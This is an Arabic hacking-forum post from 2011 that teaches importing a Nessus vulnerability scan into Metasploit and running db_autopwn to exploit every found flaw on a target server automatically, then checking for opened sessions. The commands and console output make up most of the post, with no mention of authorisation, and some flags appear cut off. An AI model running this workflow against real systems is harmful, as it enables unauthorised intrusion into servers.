التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. قـسم الأختراق المتقدم .:: Advanced Hacking Section .:: ] > MetaSploit

 
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 02-04-2011, 01:45 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية head-shot
 

 

 
إحصائية العضو





head-shot غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
head-shot is on a distinguished road

افتراضي ~~~~Nessus with Metasploit By HeaDShoT~~~~





أهلا و سهلا بكافّة الإخوة الأعضاء و الزوّآر في منتديات VBSPIDER
ندعوكم لمتابعة هذاا الموضوع الجديد إن شاء الله تعـالى ..

نكمل درس سابق في nessus لكن مع استغلاله في هجوم autopwn معروف في metasploit
[COLOR="rgb(0, 100, 0)"]إن شاء الله يعجبكم شرح [/COLOR]
===============================================
أولاً نبدأ على بركة الله بنقطة وهي يجب تسجيل تقرير الفحص بعد كل فحص وطريقة كتالي

كود PHP:
Export name_of_fichier.nbe 
أو ستجد عند ضغط على فحص عند مايكمل
كود PHP:
Download name.nessus 
ثم الأن سنتنقل لكيفية إستغلال هذا تقرير مع metasploit
أولاً نفتح msfconsole
كود PHP:
root@bt4:/pentest/exploits/framework3# ./msfconsole 
ثم نضغط تالي :
كود PHP:
msf db_create 
كود PHP:
msf load db_tracker 
نحن أن عملنا قاعدة بيانات الأن سنضغط على help لنرى options موجودة
كود PHP:
msf help.

Database Backend Commands
=========================

    
Command               Description
    
-------               -----------
    
db_add_host           Add one or more hosts to the database
    db_add_note           Add a note to host
    db_add_port           Add a port to host
    db_autopwn            Automatically exploit everything
    db_connect            Connect to an existing database
    db_create             Create a brand 
new database
    db_del_host           Delete one 
or more hosts from the database
    db_del_port           Delete one port from the database
    db_destroy            Drop an existing database
    db_disconnect         Disconnect from the current database instance
    db_driver             Specify a database driver
    db_hosts              
List all hosts in the database
    db_import_amap_mlog   Import a THC
-Amap scan results file (--m)
    
db_import_nessus_nbe  Import a Nessus scan result file (NBE)
    
db_import_nessus_xml  Import a Nessus scan result file (NESSUS)
    
db_import_nmap_xml    Import a Nmap scan results file (-oX)
    
db_nmap               Executes nmap and records the output automatically
    db_notes              
List all notes in the database
    db_services           
List all services in the database
    db_vulns              
List all vulnerabilities in the database

msf 

أن لنذهب ونأتي بتقرير nessus *.nbe ثم نضغط على db_hosts لإظهار هدف الذي عملنا له فحص
كود PHP:
msf db_import_nessus_nbe /root/namefile.nbe
msf 
db_hosts[*] Timedate Hostip Statusalive OS
أن نضغط أمر تالي لإظهار خدمات شغالة في سرفير هدف
كود PHP:
msf db_services 
وأن نظهر ثغرات التي وجدت في سرفير من خلال nessus بالأمر تالي

كود PHP:
msf db_vulns 
وأخيراً ننفذ هجومنا autopwn واللذي سيعمل على ثغرات اللتي وجدت من خلال nessus

كود PHP:
msf db_autopwn --
ثم نضغط على لنرى هل حصلنا على إتصل أو لا
كود PHP:
msf sessions -
اتمنى أن الموضوع أعجبكم
أخوكم HeaDShoT من تونس




ZZZZNessus with Metasploit By HeaDShoTZZZZ

   

رد مع اقتباس
 

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 11:34 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0